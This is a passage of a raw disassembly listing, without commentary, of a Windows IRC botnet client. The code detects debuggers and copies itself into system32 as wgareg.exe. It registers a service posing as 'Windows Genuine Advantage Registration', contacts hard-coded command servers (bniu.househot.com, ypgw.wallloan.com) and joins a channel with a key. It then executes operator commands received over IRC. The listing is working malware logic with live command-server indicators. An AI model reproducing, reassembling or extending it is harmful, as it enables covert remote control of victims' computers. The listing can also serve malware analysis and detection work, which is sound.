call dword_4010D0 ; RtlGetLastWin32Error
cmp eax, 0B7h
jnz short loc_402625
loc_40261D: ; CODE XREF: sub_4025F4+1A�j
push 0
call dword_4010D4 ; ExitProcess
loc_402625: ; CODE XREF: sub_4025F4+27�j
call sub_4034DF
lea eax, [ebp+var_190]
push eax
push 101h
call dword_401144 ; WSAStartup
loc_40263C: ; CODE XREF: sub_4025F4+58�j
call sub_4028D3
push 4000h
call dword_4010DC ; Sleep
jmp short loc_40263C
sub_4025F4 endp
; ---------------------------------------------------------------------------
dw 0C3C9h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402650 proc near ; CODE XREF: MEW:004025D4�p
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push 104h
push offset aCWindowsSystem ; "C:\\WINDOWS\\system32\\wgareg.exe"
call dword_4010C0 ; GetSystemDirectoryA
push offset aWgareg_exe ; "wgareg.exe"
push offset aCWindowsSystem ; "C:\\WINDOWS\\system32\\wgareg.exe"
push offset dword_4016B8
push offset aCWindowsSystem ; "C:\\WINDOWS\\system32\\wgareg.exe"
call dword_401104 ; wsprintfA
add esp, 10h
push 20h
push offset aCWindowsSystem ; "C:\\WINDOWS\\system32\\wgareg.exe"
call dword_4010C4 ; SetFileAttributesA
and [ebp+var_4], 0
jmp short loc_40269B
; ---------------------------------------------------------------------------
loc_402694: ; CODE XREF: sub_402650+74�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_40269B: ; CODE XREF: sub_402650+42�j
cmp [ebp+var_4], 5
jge short loc_4026C6
push 0
push offset aCWindowsSystem ; "C:\\WINDOWS\\system32\\wgareg.exe"
push offset aCM_unpackerPac ; "C:\\m_unpacker\\packed.exe"
call dword_4010C8 ; CopyFileA
test eax, eax
jz short loc_4026B9
jmp short loc_4026C6
; ---------------------------------------------------------------------------
loc_4026B9: ; CODE XREF: sub_402650+65�j
push 1400h
call dword_4010DC ; Sleep
jmp short loc_402694
; ---------------------------------------------------------------------------
loc_4026C6: ; CODE XREF: sub_402650+4F�j
; sub_402650+67�j
call sub_4026D6
test eax, eax
jz short locret_4026D4
call sub_4037DC
locret_4026D4: ; CODE XREF: sub_402650+7D�j
leave
retn
sub_402650 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4026D6 proc near ; CODE XREF: sub_402650:loc_4026C6�p
var_128 = byte ptr -128h
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 128h
push 12h
push 0
push 0
call dword_401008 ; OpenSCManagerA
mov [ebp+var_18], eax
push 10h
push offset aWgareg ; "wgareg"
push [ebp+var_18]
call dword_401004 ; OpenServiceA
mov [ebp+var_20], eax
cmp [ebp+var_20], 0
jnz loc_4027A0
push 0
push 0
push 0
push 0
push 0
push offset aCWindowsSystem ; "C:\\WINDOWS\\system32\\wgareg.exe"
push 0
push 2
push 110h
push 40012h
push offset aWindowsGenuine ; "Windows Genuine Advantage Registration "...
push offset aWgareg ; "wgareg"
push [ebp+var_18]
call dword_40103C ; CreateServiceA
mov [ebp+var_20], eax
mov [ebp+var_28], 1
and [ebp+var_24], 0
and [ebp+var_14], 0
and [ebp+var_10], 0
and [ebp+var_C], 0
mov [ebp+var_8], 1
lea eax, [ebp+var_28]
mov [ebp+var_4], eax
lea eax, [ebp+var_14]
push eax
push 2
push [ebp+var_20]
call dword_401028 ; ChangeServiceConfig2A
push 100h
push offset aEnsuresThatYou ; "Ensures that your copy of Microsoft Win"...
lea eax, [ebp+var_128]
push eax
call dword_4010BC ; lstrcpynA
lea eax, [ebp+var_128]
mov [ebp+var_1C], eax
lea eax, [ebp+var_1C]
push eax
push 1
push [ebp+var_20]
call dword_401028 ; ChangeServiceConfig2A
loc_4027A0: ; CODE XREF: sub_4026D6+2F�j
push 0
push 0
push [ebp+var_20]
call dword_401038 ; StartServiceA
leave
retn
sub_4026D6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4027AF proc near ; CODE XREF: sub_403062+16D�p
; sub_404CE7+1B2�p
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ecx
push 10000h
push 0
push 0
call dword_401008 ; OpenSCManagerA
mov [ebp+var_4], eax
push 10000h
push offset aWgareg ; "wgareg"
push [ebp+var_4]
call dword_401004 ; OpenServiceA
mov [ebp+var_8], eax
push [ebp+var_8]
call dword_401010 ; DeleteService
push [ebp+var_8]
call dword_40100C ; CloseServiceHandle
push [ebp+var_4]
call dword_40100C ; CloseServiceHandle
call sub_4037DC
leave
retn
sub_4027AF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4027FE proc near ; CODE XREF: MEW:004025C1�p
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push 104h
push offset aCM_unpackerPac ; "C:\\m_unpacker\\packed.exe"
push 0
call dword_4010B8 ; GetModuleFileNameA
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
mov byte ptr aCM_unpackerPac[eax], 0 ; "C:\\m_unpacker\\packed.exe"
push 44h
push offset dword_401600
call sub_4038D9
mov dword_401600, 44h
mov dword_40162C, 81h
and word_401630, 0
leave
retn
sub_4027FE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40284B proc near ; CODE XREF: MEW:004025B5�p
push ebp
mov ebp, esp
push 0
push 0
push 0
push offset loc_402865
push 0
push 0
call dword_4010B4 ; CreateThread
pop ebp
retn
; ---------------------------------------------------------------------------
loc_402865: ; DATA XREF: sub_40284B+9�o
push ebp
mov ebp, esp
loc_402868: ; CODE XREF: sub_40284B+3A�j
call dword_4010B0 ; IsDebuggerPresent
test eax, eax
jz short loc_40287A
push 0
call dword_4010D4 ; ExitProcess
loc_40287A: ; CODE XREF: sub_40284B+25�j
push 80h
call dword_4010DC ; Sleep
jmp short loc_402868
sub_40284B endp
; ---------------------------------------------------------------------------
db 5Dh
db 0C2h, 4, 0
; ---------------------------------------------------------------------------
loc_40288B: ; DATA XREF: MEW:004025A6�o
push ebp
mov ebp, esp
sub esp, 20h
push offset loc_4028CC
push offset aWgareg ; "wgareg"
call dword_401018 ; RegisterServiceCtrlHandlerA
mov [ebp-20h], eax
mov dword ptr [ebp-1Ch], 10h
mov dword ptr [ebp-18h], 4
and dword ptr [ebp-14h], 0
lea eax, [ebp-1Ch]
push eax
push dword ptr [ebp-20h]
call dword_401014 ; SetServiceStatus
call sub_4025F4
; ---------------------------------------------------------------------------
dd 8C2C9h
; ---------------------------------------------------------------------------
loc_4028CC: ; DATA XREF: MEW:00402891�o
push ebp
mov ebp, esp
pop ebp
retn 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4028D3 proc near ; CODE XREF: sub_4025F4:loc_40263C�p
var_544 = dword ptr -544h
var_540 = dword ptr -540h
var_53C = word ptr -53Ch
var_53A = word ptr -53Ah
var_538 = dword ptr -538h
var_52C = dword ptr -52Ch
var_528 = dword ptr -528h
var_524 = dword ptr -524h
var_520 = byte ptr -520h
var_11C = dword ptr -11Ch
var_118 = dword ptr -118h
var_114 = dword ptr -114h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 544h
call sub_403A18
cmp dword_401290, offset aBniu_househot_ ; "bniu.househot.com"
jnz short loc_402905
mov dword_401290, offset aYpgw_wallloan_ ; "ypgw.wallloan.com"
mov ax, word_4016F4
mov word_401294, ax
jmp short loc_40291B
; ---------------------------------------------------------------------------
loc_402905: ; CODE XREF: sub_4028D3+18�j
mov dword_401290, offset aBniu_househot_ ; "bniu.househot.com"
mov ax, word_4016DC
mov word_401294, ax
loc_40291B: ; CODE XREF: sub_4028D3+30�j
push dword_401290
call dword_401120 ; gethostbyname
mov [ebp+var_11C], eax
cmp [ebp+var_11C], 0
jnz short loc_40293B
jmp locret_402C51
; ---------------------------------------------------------------------------
loc_40293B: ; CODE XREF: sub_4028D3+61�j
and dword_40128C, 0
mov eax, dword_40128C
mov dword_401288, eax
mov eax, [ebp+var_11C]
mov eax, [eax+0Ch]
mov eax, [eax]
mov eax, [eax]
mov [ebp+var_538], eax
mov [ebp+var_53C], 2
mov ax, word_401294
mov [ebp+var_53A], ax
push 6
push 1
push 2
call dword_401160 ; socket
mov dword_4014DC, eax
mov [ebp+var_10], 1
push 4
lea eax, [ebp+var_10]
push eax
push 8
push 0FFFFh
push dword_4014DC
call dword_401128 ; setsockopt
push 10h
lea eax, [ebp+var_53C]
push eax
push dword_4014DC
call dword_40112C ; connect
push 0
push 0Dh
push offset aUserLLLL ; "USeR l l l l\n"
push dword_4014DC
call dword_401130 ; send
call sub_4034BB
push 20h
push offset dword_401498
push offset dword_4014A8
call dword_4010BC ; lstrcpynA
push offset dword_4014A8
push offset aNick_24s ; "NiCK %.24s\n"
push offset dword_401298
call dword_401104 ; wsprintfA
add esp, 0Ch
mov dword_4014C8, eax
push 0
push dword_4014C8
push offset dword_401298
push dword_4014DC
call dword_401130 ; send
mov [ebp+var_4], 10h
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_53C]
push eax
push dword_4014DC
call dword_401134 ; getsockname
mov eax, [ebp+var_538]
mov dword_4014D4, eax
and [ebp+var_4], 0
and [ebp+var_118], 0
loc_402A51: ; CODE XREF: sub_4028D3+1F4�j
and [ebp+var_540], 0
jmp short loc_402A67
; ---------------------------------------------------------------------------
loc_402A5A: ; CODE XREF: sub_4028D3:loc_402A8C�j
mov eax, [ebp+var_540]
inc eax
mov [ebp+var_540], eax
loc_402A67: ; CODE XREF: sub_4028D3+185�j
mov eax, [ebp+var_540]
cmp eax, [ebp+var_118]
jnb short loc_402A8E
mov eax, [ebp+var_540]
mov eax, [ebp+eax*4+var_114]
cmp eax, dword_4014DC
jnz short loc_402A8C
jmp short loc_402A8E
; ---------------------------------------------------------------------------
loc_402A8C: ; CODE XREF: sub_4028D3+1B5�j
jmp short loc_402A5A
; ---------------------------------------------------------------------------
loc_402A8E: ; CODE XREF: sub_4028D3+1A0�j
; sub_4028D3+1B7�j
mov eax, [ebp+var_540]
cmp eax, [ebp+var_118]
jnz short loc_402AC5
cmp [ebp+var_118], 40h
jnb short loc_402AC5
mov eax, [ebp+var_540]
mov ecx, dword_4014DC
mov [ebp+eax*4+var_114], ecx
mov eax, [ebp+var_118]
inc eax
mov [ebp+var_118], eax
loc_402AC5: ; CODE XREF: sub_4028D3+1C7�j
; sub_4028D3+1D0�j
xor eax, eax
jnz short loc_402A51
mov eax, dword_401708
mov [ebp+var_528], eax
and [ebp+var_524], 0
loc_402ADB: ; CODE XREF: sub_4028D3+36D�j
lea eax, [ebp+var_528]
push eax
push 0
push 0
lea eax, [ebp+var_118]
push eax
push 0
call dword_401138 ; select
cmp eax, 1
jnz loc_402C45
push 0
mov eax, 400h
sub eax, [ebp+var_4]
push eax
mov eax, [ebp+var_4]
lea eax, [ebp+eax+var_520]
push eax
push dword_4014DC
call dword_40113C ; recv
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jg short loc_402B2E
jmp loc_402C45
; ---------------------------------------------------------------------------
loc_402B2E: ; CODE XREF: sub_4028D3+254�j
mov eax, [ebp+var_4]
add eax, [ebp+var_8]
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
mov [ebp+eax+var_520], 0
lea eax, [ebp+var_520]
mov [ebp+var_52C], eax
loc_402B4E: ; CODE XREF: sub_4028D3:loc_402BBB�j
mov eax, [ebp+var_52C]
movsx eax, byte ptr [eax]
test eax, eax
jz short loc_402BBD
push 0Dh
push [ebp+var_52C]
call sub_40395A
mov [ebp+var_C], eax
cmp [ebp+var_C], 0
jz short loc_402B8F
mov eax, [ebp+var_C]
mov byte ptr [eax], 0
push [ebp+var_52C]
call sub_402C9E
mov eax, [ebp+var_C]
inc eax
inc eax
mov [ebp+var_52C], eax
jmp short loc_402BBB
; ---------------------------------------------------------------------------
loc_402B8F: ; CODE XREF: sub_4028D3+29C�j
mov eax, [ebp+var_4]
lea eax, [ebp+eax+var_520]
sub eax, [ebp+var_52C]
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
inc eax
push eax
push [ebp+var_52C]
lea eax, [ebp+var_520]
push eax
call sub_40392B
jmp short loc_402BC1
; ---------------------------------------------------------------------------
loc_402BBB: ; CODE XREF: sub_4028D3+2BA�j
jmp short loc_402B4E
; ---------------------------------------------------------------------------
loc_402BBD: ; CODE XREF: sub_4028D3+286�j
and [ebp+var_4], 0
loc_402BC1: ; CODE XREF: sub_4028D3+2E6�j
and [ebp+var_118], 0
loc_402BC8: ; CODE XREF: sub_4028D3+36B�j
and [ebp+var_544], 0
jmp short loc_402BDE
; ---------------------------------------------------------------------------
loc_402BD1: ; CODE XREF: sub_4028D3:loc_402C03�j
mov eax, [ebp+var_544]
inc eax
mov [ebp+var_544], eax
loc_402BDE: ; CODE XREF: sub_4028D3+2FC�j
mov eax, [ebp+var_544]
cmp eax, [ebp+var_118]
jnb short loc_402C05
mov eax, [ebp+var_544]
mov eax, [ebp+eax*4+var_114]
cmp eax, dword_4014DC
jnz short loc_402C03
jmp short loc_402C05
; ---------------------------------------------------------------------------
loc_402C03: ; CODE XREF: sub_4028D3+32C�j
jmp short loc_402BD1
; ---------------------------------------------------------------------------
loc_402C05: ; CODE XREF: sub_4028D3+317�j
; sub_4028D3+32E�j
mov eax, [ebp+var_544]
cmp eax, [ebp+var_118]
jnz short loc_402C3C
cmp [ebp+var_118], 40h
jnb short loc_402C3C
mov eax, [ebp+var_544]
mov ecx, dword_4014DC
mov [ebp+eax*4+var_114], ecx
mov eax, [ebp+var_118]
inc eax
mov [ebp+var_118], eax
loc_402C3C: ; CODE XREF: sub_4028D3+33E�j
; sub_4028D3+347�j
xor eax, eax
jnz short loc_402BC8
jmp loc_402ADB
; ---------------------------------------------------------------------------
loc_402C45: ; CODE XREF: sub_4028D3+225�j
; sub_4028D3+256�j
push dword_4014DC
call dword_401140 ; closesocket
locret_402C51: ; CODE XREF: sub_4028D3+63�j
leave
retn
sub_4028D3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402C53 proc near ; CODE XREF: sub_403062+3C9�p
; sub_403062+40D�p ...
var_204 = dword ptr -204h
var_200 = byte ptr -200h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 204h
push [ebp+arg_0]
push offset dword_4016F8
push offset aPrivmsg_16s_48 ; "PRiVMSG %.16s :%.480s\n"
lea eax, [ebp+var_200]
push eax
call dword_401104 ; wsprintfA
add esp, 10h
mov [ebp+var_204], eax
push 0
push [ebp+var_204]
lea eax, [ebp+var_200]
push eax
push dword_4014DC
call dword_401130 ; send
leave
retn 4
sub_402C53 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402C9E proc near ; CODE XREF: sub_4028D3+2AA�p
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 24h
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax]
cmp eax, 3Ah
jnz short loc_402CDD
mov eax, [ebp+arg_0]
inc eax
mov [ebp+var_4], eax
push 20h
push [ebp+var_4]
call sub_40395A
mov [ebp+var_C], eax
cmp [ebp+var_C], 0
jnz short loc_402CCE
jmp locret_40305E
; ---------------------------------------------------------------------------
loc_402CCE: ; CODE XREF: sub_402C9E+29�j
mov eax, [ebp+var_C]
mov byte ptr [eax], 0
mov eax, [ebp+var_C]
inc eax
mov [ebp+var_C], eax
jmp short loc_402CE7
; ---------------------------------------------------------------------------
loc_402CDD: ; CODE XREF: sub_402C9E+F�j
and [ebp+var_4], 0
mov eax, [ebp+arg_0]
mov [ebp+var_C], eax
loc_402CE7: ; CODE XREF: sub_402C9E+3D�j
push 20h
push [ebp+var_C]
call sub_40395A
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jnz short loc_402D01
jmp locret_40305E
; ---------------------------------------------------------------------------
db 0EBh
db 0Dh
; ---------------------------------------------------------------------------
loc_402D01: ; CODE XREF: sub_402C9E+5A�j
mov eax, [ebp+var_8]
mov byte ptr [eax], 0
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
push offset aPing ; "PING"
push [ebp+var_C]
call dword_4010AC ; lstrcmpA
test eax, eax
jnz short loc_402D59
push [ebp+var_8]
push offset aPong_500s_0 ; "PoNG %.500s\r\n"
push offset dword_401298
call dword_401104 ; wsprintfA
add esp, 0Ch
mov dword_4014C8, eax
push 0
push dword_4014C8
push offset dword_401298
push dword_4014DC
call dword_401130 ; send
jmp locret_40305E
; ---------------------------------------------------------------------------
loc_402D59: ; CODE XREF: sub_402C9E+80�j
push offset aPrivmsg ; "PRIVMSG"
push [ebp+var_C]
call dword_4010AC ; lstrcmpA
test eax, eax
jnz loc_402E05
and [ebp+var_10], 0
cmp [ebp+var_4], 0
jz short loc_402D92
push [ebp+var_4]
push offset dword_401710
call sub_403E5B
cmp eax, 1
jnz short loc_402D92
mov [ebp+var_10], 1
loc_402D92: ; CODE XREF: sub_402C9E+D9�j
; sub_402C9E+EB�j
push 20h
push [ebp+var_8]
call sub_40395A
mov [ebp+var_14], eax
cmp [ebp+var_14], 0
jz short loc_402E00
mov eax, [ebp+var_14]
inc eax
mov [ebp+var_14], eax
mov eax, [ebp+var_14]
movsx eax, byte ptr [eax]
cmp eax, 3Ah
jnz short loc_402DBE
mov eax, [ebp+var_14]
inc eax
mov [ebp+var_14], eax
loc_402DBE: ; CODE XREF: sub_402C9E+117�j
cmp [ebp+var_10], 1
jnz short loc_402E00
mov eax, [ebp+var_14]
movsx eax, byte ptr [eax]
movsx ecx, byte_4016DA
cmp eax, ecx
jnz short loc_402DE3
push 0
mov eax, [ebp+var_14]
inc eax
push eax
call sub_403062
jmp short loc_402E00
; ---------------------------------------------------------------------------
loc_402DE3: ; CODE XREF: sub_402C9E+135�j
mov eax, [ebp+var_14]
movsx eax, byte ptr [eax]
movsx ecx, byte_4016DB
cmp eax, ecx
jnz short loc_402E00
push 1
mov eax, [ebp+var_14]
inc eax
push eax
call sub_403062
loc_402E00: ; CODE XREF: sub_402C9E+105�j
; sub_402C9E+124�j ...
jmp locret_40305E
; ---------------------------------------------------------------------------
loc_402E05: ; CODE XREF: sub_402C9E+CB�j
push offset a433 ; "433"
push [ebp+var_C]
call dword_4010AC ; lstrcmpA
test eax, eax
jnz short loc_402E72
cmp dword_40128C, 0
jnz short loc_402E6D
call sub_4034BB
push 20h
push offset dword_401498
push offset dword_4014A8
call dword_4010BC ; lstrcpynA
push offset dword_4014A8
push offset aNick_24s ; "NiCK %.24s\n"
push offset dword_401298
call dword_401104 ; wsprintfA
add esp, 0Ch
mov dword_4014C8, eax
push 0
push dword_4014C8
push offset dword_401298
push dword_4014DC
call dword_401130 ; send
loc_402E6D: ; CODE XREF: sub_402C9E+180�j
jmp locret_40305E
; ---------------------------------------------------------------------------
loc_402E72: ; CODE XREF: sub_402C9E+177�j
push offset a332 ; "332"
push [ebp+var_C]
call dword_4010AC ; lstrcmpA
test eax, eax
jnz loc_402F16
push 20h
push [ebp+var_8]
call sub_40395A
mov [ebp+var_18], eax
cmp [ebp+var_18], 0
jz short loc_402EA4
mov eax, [ebp+var_18]
inc eax
mov [ebp+var_18], eax
jmp short loc_402EA9
; ---------------------------------------------------------------------------
loc_402EA4: ; CODE XREF: sub_402C9E+1FB�j
jmp locret_40305E
; ---------------------------------------------------------------------------
loc_402EA9: ; CODE XREF: sub_402C9E+204�j
push 20h
push [ebp+var_18]
call sub_40395A
mov [ebp+var_18], eax
cmp [ebp+var_18], 0
jz short loc_402F11
mov eax, [ebp+var_18]
inc eax
mov [ebp+var_18], eax
mov eax, [ebp+var_18]
movsx eax, byte ptr [eax]
cmp eax, 3Ah
jnz short loc_402ED5
mov eax, [ebp+var_18]
inc eax
mov [ebp+var_18], eax
loc_402ED5: ; CODE XREF: sub_402C9E+22E�j
mov eax, [ebp+var_18]
movsx eax, byte ptr [eax]
movsx ecx, byte_4016DA
cmp eax, ecx
jnz short loc_402EF4
push 0
mov eax, [ebp+var_18]
inc eax
push eax
call sub_403062
jmp short loc_402F11
; ---------------------------------------------------------------------------
loc_402EF4: ; CODE XREF: sub_402C9E+246�j
mov eax, [ebp+var_18]
movsx eax, byte ptr [eax]
movsx ecx, byte_4016DB
cmp eax, ecx
jnz short loc_402F11
push 1
mov eax, [ebp+var_18]
inc eax
push eax
call sub_403062
loc_402F11: ; CODE XREF: sub_402C9E+21C�j
; sub_402C9E+254�j ...
jmp locret_40305E
; ---------------------------------------------------------------------------
loc_402F16: ; CODE XREF: sub_402C9E+1E4�j
push offset a302 ; "302"
push [ebp+var_C]
call dword_4010AC ; lstrcmpA
test eax, eax
jnz loc_402FC4
cmp dword_401288, 0
jnz loc_402FC4
push 40h
push [ebp+var_8]
call sub_40395A
mov [ebp+var_1C], eax
cmp [ebp+var_1C], 0
jz short loc_402FBA
mov eax, [ebp+var_1C]
inc eax
mov [ebp+var_1C], eax
push 20h
push [ebp+var_1C]
call sub_40395A
mov [ebp+var_20], eax
cmp [ebp+var_20], 0
jz short loc_402F6C
mov eax, [ebp+var_20]
mov byte ptr [eax], 0
loc_402F6C: ; CODE XREF: sub_402C9E+2C6�j
push [ebp+var_1C]
call dword_40111C ; inet_addr
mov dword_4014D8, eax
cmp dword_4014D8, 0FFFFFFFFh
jnz short loc_402FB0
push [ebp+var_1C]
call dword_401120 ; gethostbyname
mov [ebp+var_24], eax
cmp [ebp+var_24], 0
jz short loc_402FAE
mov eax, [ebp+var_24]
mov eax, [eax+0Ch]
mov eax, [eax]
mov eax, [eax]
mov dword_4014D8, eax
mov dword_401288, 1
loc_402FAE: ; CODE XREF: sub_402C9E+2F5�j
jmp short loc_402FBA
; ---------------------------------------------------------------------------
loc_402FB0: ; CODE XREF: sub_402C9E+2E3�j
mov dword_401288, 1
loc_402FBA: ; CODE XREF: sub_402C9E+2AC�j
; sub_402C9E:loc_402FAE�j
call sub_403A51
jmp locret_40305E
; ---------------------------------------------------------------------------
loc_402FC4: ; CODE XREF: sub_402C9E+288�j
; sub_402C9E+295�j
push offset a001 ; "001"
push [ebp+var_C]
call dword_4010AC ; lstrcmpA
test eax, eax
jnz locret_40305E
cmp dword_40128C, 0
jnz short locret_40305E
mov dword_40128C, 1
push offset dword_4014A8
push offset aUserhost_16s ; "USeRHOST %.16s\n"
push offset dword_401298
call dword_401104 ; wsprintfA
add esp, 0Ch
mov dword_4014C8, eax
push 0
push dword_4014C8
push offset dword_401298
push dword_4014DC
call dword_401130 ; send
push offset aNert4mp1 ; "nert4mp1"
push offset dword_4016F8
push offset aJoin_16s_16s ; "JOiN %.16s %.16s\n"
push offset dword_401298
call dword_401104 ; wsprintfA
add esp, 10h
mov dword_4014C8, eax
push 0
push dword_4014C8
push offset dword_401298
push dword_4014DC
call dword_401130 ; send
locret_40305E: ; CODE XREF: sub_402C9E+2B�j
; sub_402C9E+5C�j ...
leave
retn 4
sub_402C9E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403062 proc near ; CODE XREF: sub_402C9E+13E�p
; sub_402C9E+15D�p ...
var_420 = dword ptr -420h
var_41C = byte ptr -41Ch
var_40C = dword ptr -40Ch
var_408 = dword ptr -408h
var_404 = dword ptr -404h
var_400 = byte ptr -400h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 420h
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax]
mov [ebp+var_420], eax
cmp [ebp+var_420], 61h
jg loc_403119
cmp [ebp+var_420], 61h
jz loc_4032F6
cmp [ebp+var_420], 49h
jg short loc_4030E0
cmp [ebp+var_420], 49h
jz loc_403338
cmp [ebp+var_420], 43h
jz loc_40332E
cmp [ebp+var_420], 44h
jz loc_403480
cmp [ebp+var_420], 45h
jz loc_403435
cmp [ebp+var_420], 46h
jz loc_4033B0
jmp locret_4034B7
; ---------------------------------------------------------------------------
loc_4030E0: ; CODE XREF: sub_403062+36�j
cmp [ebp+var_420], 4Ch
jz loc_403394
cmp [ebp+var_420], 51h
jz loc_4031D9
cmp [ebp+var_420], 52h
jz loc_4031AE
cmp [ebp+var_420], 53h
jz loc_4033D9
jmp locret_4034B7
; ---------------------------------------------------------------------------
loc_403119: ; CODE XREF: sub_403062+1C�j
cmp [ebp+var_420], 6Ch
jg short loc_403175
cmp [ebp+var_420], 6Ch
jz loc_403382
cmp [ebp+var_420], 63h
jz loc_403312
cmp [ebp+var_420], 65h
jz loc_403354
cmp [ebp+var_420], 66h
jz loc_4033A6
cmp [ebp+var_420], 68h
jz loc_403487
cmp [ebp+var_420], 69h
jz loc_4032AE
jmp locret_4034B7
; ---------------------------------------------------------------------------
loc_403175: ; CODE XREF: sub_403062+BE�j
cmp [ebp+var_420], 6Eh
jz loc_4033E3
cmp [ebp+var_420], 71h
jz loc_4034A0
cmp [ebp+var_420], 73h
jz loc_4033BA
cmp [ebp+var_420], 75h
jz loc_403354
jmp locret_4034B7
; ---------------------------------------------------------------------------
loc_4031AE: ; CODE XREF: sub_403062+9F�j
push 0
push 5
push offset aQuit ; "QUiT\n"
push dword_4014DC
call dword_401130 ; send
push dword_4014DC
call dword_401140 ; closesocket
call sub_4027AF
jmp locret_4034B7
; ---------------------------------------------------------------------------
loc_4031D9: ; CODE XREF: sub_403062+92�j
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax+1]
cmp eax, 20h
jnz loc_4032A9
mov eax, [ebp+arg_0]
inc eax
inc eax
mov [ebp+var_40C], eax
and [ebp+var_408], 0
and [ebp+var_404], 0
jmp short loc_403212
; ---------------------------------------------------------------------------
loc_403204: ; CODE XREF: sub_403062+225�j
mov eax, [ebp+var_408]
inc eax
inc eax
mov [ebp+var_408], eax
loc_403212: ; CODE XREF: sub_403062+1A0�j
mov eax, [ebp+var_40C]
add eax, [ebp+var_408]
movsx eax, byte ptr [eax]
test eax, eax
jz short loc_40328C
mov eax, [ebp+var_40C]
add eax, [ebp+var_408]
movsx eax, byte ptr [eax]
sub eax, 61h
shl eax, 4
mov ecx, [ebp+var_404]
mov [ebp+ecx+var_400], al
mov eax, [ebp+var_40C]
add eax, [ebp+var_408]
movsx eax, byte ptr [eax+1]
sub eax, 61h
movsx eax, al
mov ecx, [ebp+var_404]
movsx ecx, [ebp+ecx+var_400]
add ecx, eax
mov eax, [ebp+var_404]
mov [ebp+eax+var_400], cl
mov eax, [ebp+var_404]
inc eax
mov [ebp+var_404], eax
jmp loc_403204
; ---------------------------------------------------------------------------
loc_40328C: ; CODE XREF: sub_403062+1C1�j
mov eax, [ebp+var_404]
mov [ebp+eax+var_400], 0
push [ebp+arg_4]
lea eax, [ebp+var_400]
push eax
call sub_403062
loc_4032A9: ; CODE XREF: sub_403062+181�j
jmp locret_4034B7
; ---------------------------------------------------------------------------
loc_4032AE: ; CODE XREF: sub_403062+108�j
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax+1]
cmp eax, 20h
jnz short loc_4032F1
mov eax, [ebp+arg_0]
inc eax
inc eax
push eax
push offset a_500s ; "%.500s\n"
push offset dword_401298
call dword_401104 ; wsprintfA
add esp, 0Ch
mov dword_4014C8, eax
push 0
push dword_4014C8
push offset dword_401298
push dword_4014DC
call dword_401130 ; send
loc_4032F1: ; CODE XREF: sub_403062+256�j
jmp locret_4034B7
; ---------------------------------------------------------------------------
loc_4032F6: ; CODE XREF: sub_403062+29�j
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax+1]
cmp eax, 20h
jnz short loc_40330D
mov eax, [ebp+arg_0]
inc eax
inc eax
push eax
call sub_40553F
loc_40330D: ; CODE XREF: sub_403062+29E�j
jmp locret_4034B7
; ---------------------------------------------------------------------------
loc_403312: ; CODE XREF: sub_403062+D4�j
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax+1]
cmp eax, 20h
jnz short loc_403329
mov eax, [ebp+arg_0]
inc eax
inc eax
push eax
call sub_404F02
loc_403329: ; CODE XREF: sub_403062+2BA�j
jmp locret_4034B7
; ---------------------------------------------------------------------------
loc_40332E: ; CODE XREF: sub_403062+4C�j
call sub_404FBF
jmp locret_4034B7
; ---------------------------------------------------------------------------
loc_403338: ; CODE XREF: sub_403062+3F�j
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax+1]
cmp eax, 20h
jnz short loc_40334F
mov eax, [ebp+arg_0]
inc eax
inc eax
push eax
call sub_404FCE
loc_40334F: ; CODE XREF: sub_403062+2E0�j
jmp locret_4034B7
; ---------------------------------------------------------------------------
loc_403354: ; CODE XREF: sub_403062+E1�j
; sub_403062+141�j
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax+1]
cmp eax, 20h
jnz short loc_40337D
push [ebp+arg_4]
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax]
sub eax, 75h
neg eax
sbb eax, eax
inc eax
push eax
mov eax, [ebp+arg_0]
inc eax
inc eax
push eax
call sub_404CE7
loc_40337D: ; CODE XREF: sub_403062+2FC�j
jmp locret_4034B7
; ---------------------------------------------------------------------------
loc_403382: ; CODE XREF: sub_403062+C7�j
mov eax, [ebp+arg_4]
mov dword_40167C, eax
call sub_403A51
jmp locret_4034B7
